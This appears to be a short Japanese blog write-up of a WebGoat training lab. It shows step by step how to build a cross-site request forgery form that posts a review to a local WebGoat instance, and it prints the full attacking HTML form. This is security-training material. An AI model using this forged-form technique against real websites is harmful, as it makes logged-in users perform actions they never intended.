Hello there, ('ω')ノ
他の場所から送信する必要があるとのことで。
CSRF攻撃を実行する場所を見つけることがポイントのようで。
典型的な例だと、他人の銀行口座での送金らしく。
この場合だと、ログインしているユーザに代わって。
レビューの送信をトリガーする必要があるので単純にしているようで。
まずは、適当に入力して実行すると。
メッセージには、リクエストは送信先と同じホストから送信されているとのこと。
他のホストから送信するために必要な最小限の要素をHTMLファイルから抜き出して。
POST http://192.168.1.54:8000/WebGoat/csrf/review
<input name = "reviewText" value = "" type = "text">
<input name = "stars" value = "" type = "text">
<input type = "hidden" name = "validateReq" value = "2aa14227b9a13d0bede0388a7fba9aa9">
<input type = "submit" value = "Submit review">
下記のような単純なHTMLファイルを作成して。
<html>
<body>
<form action = " http://192.168.1.54:8000/WebGoat/csrf/review " method = "POST">
<input name = "reviewText" value = "" type = "text">
<input name = "stars" value = "" type = "text">
<input type = "hidden" name = "validateReq" value = "2aa14227b9a13d0bede0388a7fba9aa9">
<input type = "submit" value = "Submit review">
</ form>
</ body>
</ html>
別のタグでHTMLファイルを読み込んで、下記を入力して実行すると。
It's Bwst!!
5
別のサイトから正しく送信したようで。
リロードして、投稿があるかどうかを確認してとのことで。
もとのページに戻ってリロードすると追加されていた。
Best regards, (^^ゞ